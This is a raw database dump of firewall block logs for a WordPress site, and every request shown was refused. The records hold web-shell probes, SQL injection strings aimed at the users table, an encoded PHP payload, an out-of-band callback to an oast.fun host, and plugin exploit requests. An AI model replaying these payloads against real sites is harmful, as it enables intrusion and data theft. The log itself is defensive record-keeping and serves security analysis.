,1674729550.9460,173,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','bR730JivdfMcFEqmTCXH4oKQ',0,1674729553.0573,168,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/new_license.php','','{\"1\":\"python-requests\\/2.27.1\"}','ApuSUXZkNLHV8behsC3d49qM',0,1674729555.1570,191,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php','','{\"1\":\"python-requests\\/2.27.1\"}','IRAijcqbfQWs051FwhEpG8LZ',0,1674729556.0648,171,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php','','{\"1\":\"python-requests\\/2.27.1\"}','UgQiMVNdBF7oSXhsyfDKHjpa',0,1674729559.1833,161,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','0JzsAl92657UXuv8WSIVnNfm',0,1674729561.9644,161,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/modules/modules/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','8cOzJa03ewSMA4fK2DvplHmx',0,1674729563.3296,158,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/Clean.php','','{\"1\":\"python-requests\\/2.27.1\"}','XpnVq3yj98PwCTJegSDOxGbu',0,1674729564.5053,189,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/udd.php','','{\"1\":\"python-requests\\/2.27.1\"}','8IaTEDR5PeqlmyKZMjJgfhos',0,1674729565.8897,170,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/libraries/joomla/css.php','','{\"1\":\"python-requests\\/2.27.1\"}','1XscmAKo50lnFaJwUWebZxpB',0,1674729567.6080,162,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/libraries/joomla/jmails.php?u','','{\"1\":\"python-requests\\/2.27.1\"}','DTJqnS7O5xPjA9koLVGmvR8s',0,1674729570.0406,186,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/libraries/joomla/jmail.php?u','','{\"1\":\"python-requests\\/2.27.1\"}','lj8rR3GhEXOPudmgMv7QJTBN',0,1674729572.0670,178,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/images/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','lmDAsVy3a5v4e0TK1QwLgkcM',0,1674729573.4030,180,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/tmp/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','HMpawu9VSFbGcrA6Txn2XRDW',0,1674729576.1043,186,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/XxX.php','','{\"1\":\"python-requests\\/2.27.1\"}','TDsivN8yCFQPGVB2cJqmUHEa',0,1674729577.4156,156,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/Marvins.php','','{\"1\":\"python-requests\\/2.27.1\"}','vmguTCQjxfpRa9UzFY1hwykB',0,1674729579.6726,171,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/rxr.php?rxr','','{\"1\":\"python-requests\\/2.27.1\"}','AmlDgcb49wixt0eoR6OK3dsT',0,1674729580.9987,237,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','fozgw159n4EjuUs6FHpaSZMY',0,1674729582.3821,206,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','C1FDB3bT6zIHngaNfVeOYs2v',0,1674729583.7241,211,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','t8ITYFdZ0CNzhKDP6X2lL39M',0,1674729584.8083,199,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/RxR.php','','{\"1\":\"python-requests\\/2.27.1\"}','aGlvrN2b7VXIhxYmpgUzq0yE',0,1674729586.3100,162,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/components/com_b2jcontact/izoc.php','','{\"1\":\"python-requests\\/2.27.1\"}','e0klhKqtpWH1gimAxTD2wLvj',0,1674729588.6572,172,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/V3.php','','{\"1\":\"python-requests\\/2.27.1\"}','SC0OdUs7vGVwylzanfugLZMq',0,1674729590.8903,161,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','VR56XWqE7oh21B0Csi3QeZxP',0,1674729591.8621,177,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','djtMYHzTEyiBVRr1FxQDXfb3',0,1674729596.5587,185,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','5bS3Mr9mv8DFXRKOLqo2plVw',0,1674729598.4870,178,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','sRQnw7fALB5gvr806yJtNioD',0,1674729600.6474,229,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/administrator/templates/bluestork/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','uhjYPEXIfN4eTsHtKBgM3Vvo',0,1674729602.1729,164,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/administrator/templates/bluestork/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','VTQNiGDpUrZRl3kHt05KuXIY',0,1674729604.6085,184,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/administrator/templates/hathor/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','1Qd5zkqjm8OZD64Epglrh2v9',0,1674729607.3824,171,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/administrator/templates/hathor/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','uaI3obQlC7iGecEvrkJzns95',0,1674729609.6358,194,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/administrator/templates/isis/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','SO2gE4VNl7x1TdsXDRKrW6Zi',0,1674729611.6428,218,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/administrator/templates/isis/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','QIoZj9sS8YuXNzac5eyq6VCD',0,1674729613.1167,171,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/templates/beez/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','IU46r3P5VOpRXbusynQtJ9hZ',0,1674729614.5095,186,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/templates/ja_purity/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','WMsQpJvVfOTZnFjG3DmqkreS',0,1674729615.7811,182,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/templates/rhuk_milkyway/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','Aaj0KXplnYR3L7ehNVZk1s4W',0,1674729617.1320,164,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/templates/system/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','eZm0UoO5YlwRaVkiStADJQLx',0,1674729618.8285,164,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/templates/system/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','9Gbvm4sM12OYZTc0xHVfPz7W',0,1674729620.0450,165,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/templates/beez3/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','BbduHqX7zhga04eYrkGl1nUP',0,1674729621.4765,166,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/templates/beez3/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','kamBXGPHQVjbFL26pv0Mhir9',0,1674729623.0426,164,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/templates/beez5/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','A6V5SC39KxEzG4yqkYhps7IP',0,1674729623.8753,183,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/templates/beez5/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','tKE1f4BgFoIeG076McvVxHUs',0,1674729626.4658,224,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/templates/beez_20/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','wx1dBICN4eaVLSfcP8KGHFjh',0,1674729628.5327,201,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/templates/beez_20/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','weUF0sQubPk94Cy7oJ6RYrqc',0,1674729640.9823,189,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/templates/protostar/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','JOSYKL9B6nNVhrwmyodCXWGI',0,1674729643.5057,213,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/templates/protostar/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','hTR01rinmCBPQsNlFEHVKJxX',0,1674729644.5781,174,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/templates/atomic/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','MzHUnf7h5bGDN2gy4FL3Q6ZV',0,1674729646.5961,161,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/templates/atomic/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','HJ9jvkMFhontxUEO4lbiB5c6',0,1674729647.4411,170,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','AtyHKnp13lTqoMZOIuk6iDEz',0,1674729648.4552,228,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','EyYxUiW1JVRzcwT4XQlHaPj3',0,1674729650.2747,188,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','BfTniHs6IbZKkAlM9gPOoh2E',0,1674729651.6891,172,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','fktBhopqvD4xi5SFKA2PT7aj',0,1674729653.3395,156,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','HFkGSuMjpsDowQrCg3UERIZ8',0,1674729686.3449,178,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','HDt9SRpAKXTWmfqbxjBnYhMo',0,1674729688.4490,168,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','QBaSdOhCuy1ATVs7xI8Lflw0',0,1674729691.2623,161,'','GET',403,0,700,0,1,'',0),('109.248.175.137',1845014409,'','https://www.dailyjolly.co.uk/ss.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','klgX2vTw8MCn0IdrR9x5FBmh',0,1674736288.3713,206,'','GET',403,0,700,0,1,'',0),('147.78.47.230',2471374822,'','https://dailyjolly.co.uk/wp-reset.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.82 Safari\\/537.36\",\"2\":\"http:\\/\\/dailyjolly.co.uk\\/wp-reset.php\"}','3KOM7jazJQhHlsykCuwF0oYN',0,1674749394.2313,204,'','GET',403,0,700,0,1,'',0),('109.248.175.137',1845014409,'','https://www.dailyjolly.co.uk/v33.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','8zQsHZ3MgXSIOAiveKhCLWot',0,1674753054.2155,225,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wp-content/plugins/wp-cache/index.php','','{\"1\":\"Linux Mozilla\"}','MairWUIeGzX4tjlRLS5d3mwg',0,1674754345.4898,237,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wp-content/plugins/handline/handline.php','','{\"1\":\"Linux Mozilla\"}','oist9TFjCI6M4krhueYEgzSO',0,1674754347.4208,200,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wp-node.php','','{\"1\":\"Linux Mozilla\"}','OETHGxX0jVKC143PcZk9wgrt',0,1674754348.7113,203,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wp-content/plugins/core-builder/index.php','','{\"1\":\"Linux Mozilla\"}','ZsfxeP8TGRN0C1YXo7k3Fzr6',0,1674754349.9705,224,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wp/wp-content/plugins/core-builder/index.php','','{\"1\":\"Linux Mozilla\"}','VKOmMfRQduWGo30xJcZl68A5',0,1674754351.1230,175,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wordpress/wp-content/plugins/core-builder/index.php','','{\"1\":\"Linux Mozilla\"}','7iJAxLnYUgpVk2W14DCdtvZ0',0,1674754353.0724,186,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/blog/wp-content/plugins/core-builder/index.php','','{\"1\":\"Linux Mozilla\"}','7Gpo53efmUzCJwO4E6XvDTxu',0,1674754353.8660,199,'','GET',403,0,700,0,1,'',0),('185.192.70.50',3116385842,'','https://dailyjolly.co.uk/wp-admin/imagescheckflush.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','QCz0xNDp9grvPFRZbA16o7X8',0,1674771305.3439,240,'','POST',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wp-content/languages/plugins/plugins.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','KUTvafM3Cmdi8LFIPtDOscXe',0,1674773111.9998,328,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','7AOnsPzJkyxmUT5M9dZe12Lr',0,1674796741.4805,322,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/?rest_route=/olistener/new','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','S7a6CAQPtEGup2BNJbXlvjLh',0,1674796741.7997,209,'','POST',403,0,520,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/wp-content/plugins/wp-payeezy-pay/donate.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','HAqg4wDTSfJYhazNCZ0kQ6mr',0,1674796742.0648,203,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.0 Safari\\/537.36\"}','HaPzsFRNL4YoqQfiDc9dWCrv',0,1674796741.5845,1098,'','GET',403,0,520,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','MhAkremzvbluaLGCRNIxtwX7',0,1674796742.6103,310,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (X11; OpenBSD i386) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','rOKPwVi5s4EzoBjGa7mQfkRu',0,1674796742.7579,318,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','vz8cR4l6HNwqBjmbrAITDFnZ',0,1674796743.0653,206,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/?pid=0&uid=0&url=test&visitorId=1331\'+and+sleep(5)+or+\'&wmcAction=wmcTrack','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/40.0.2214.93 Safari\\/537.36\"}','4al1CSWIDoZVcdQUBp3yr9nM',0,1674796743.2409,181,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','yjGXLmUV7CtwKZQN5JxTEkF3',0,1674796743.2408,202,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/wp-content/uploads/workreap-temp/2KtbH41NdK35oD7yH7dzvi3sQYo.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2866.71 Safari\\/537.36\"}','nRd9eMA6bGfcqhUS3HB0w5Ps',0,1674796743.3844,200,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','ugJI28PO7rFLv6UeqnYxiAHw',0,1674796743.4063,199,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/?rest_route=/notificationx/v1/analytics','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','kjN5wtRodDgMWaC4SfXnI2Yh',0,1674796743.7505,207,'','POST',403,0,520,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/index.php?rest_route=/xs-donate-form/payment-redirect/3','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','tasOSfubmyHvGiUzY64MFlwj',0,1674796743.8874,188,'','GET',403,0,520,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/wp-json/am-member/license','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.0 Safari\\/537.36\"}','UEFYc0I5uT1bLfxdtkSXCy7Z',0,1674796744.0316,193,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','dE354CORDSjlrAZm78whHnBM',0,1674796744.1719,190,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/wp-content/uploads/2KtbF4Ysr50wOqn2zJ1Of8T097F.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','WqlkHtEzDafOSNK82Yhg7reV',0,1674796744.6606,263,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/index.php/video?dl=aHR0cDovL2ludGVyYWN0LnNoLw==','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.3319.102 Safari\\/537.36\"}','ytbAuzS4hZlxrjPmFe0EHkWM',0,1674796744.7460,275,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/wp-content/uploads/kaswara/fonts_icon/vakbpn/mf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/34.0.1866.237 Safari\\/537.36\"}','GZC7X8EVlBk0ewK6LnhAxRv5',0,1674796745.4094,172,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/wp-content/plugins/imagements/images/2ktbhq0nxcmapyelyw55cpzuj5d.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.47 Safari\\/537.36\"}','XS4qdGmxlKAgb9Ir3VUEsP6n',0,1674796745.4444,172,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/wp-content/plugins/simple-file-list/ee-file-engine.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1944.0 Safari\\/537.36\"}','o4G0xT2KBZzvCuadOELJDhU1',0,1674796746.0360,189,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/wp-content/uploads/html2wp/2KtbHLCLRenXe3AkjR2wu3F452s.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.2309.372 Safari\\/537.36\"}','EndCgLylAXbMKGRmhcNu5V4Y',0,1674796746.3804,157,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/wp-content/uploads/simple-file-list/nuclei.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\"}','v4AZU9ECn5pWHhBz8iTFqjkG',0,1674796746.3804,159,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.47 Safari\\/537.36\"}','FG9Dm1xCJunfqTcgekAdP8bi',0,1674796746.7173,163,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/?qtproxycall=http://cf9ltgq9k8i55ho00010gkjtaktgk5ahz.oast.fun','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','X2tx9noKAduTGLNRHUWs3jaF',0,1674796747.4636,221,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/wp-json/visualizer/v1/upload-data','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','zhngsXcQJk5AoEam7bwd1UVP',0,1674796747.4624,251,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/wp-content/plugins/wpcargo/includes/2KtbGdRgtvBP9PSQn71Wjgmm3J2.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2866.71 Safari\\/537.36\"}','lL8VQ9rfgvxG0XJekphN1bzd',0,1674796747.6340,219,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/wp-content/plugins/wpcargo/includes/barcode.php?filepath=2KtbGdRgtvBP9PSQn71Wjgmm3J2.php&size=1&sizefactor=.090909090909&text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\"}','FHJqXozsfj4wyu0gpPYEdCl5',0,1674796747.9050,180,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/wp-content/plugins/wpcargo/includes/2KtbGdRgtvBP9PSQn71Wjgmm3J2.php?1=var_dump','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2062.124 Safari\\/537.36\"}','UzYEj0XiHCOl5IkL2Wdsfu1h',0,1674796748.5197,169,'','POST',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','6aGQT0uqbFeCOlwdLvS2BpWo',0,1674797374.4494,397,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko\\/20100101 Firefox\\/71.0\"}','0XMIf4a3wKGrUWcxyYNjFLB5',0,1674797406.6154,248,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-content/plugins/seoplugin/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 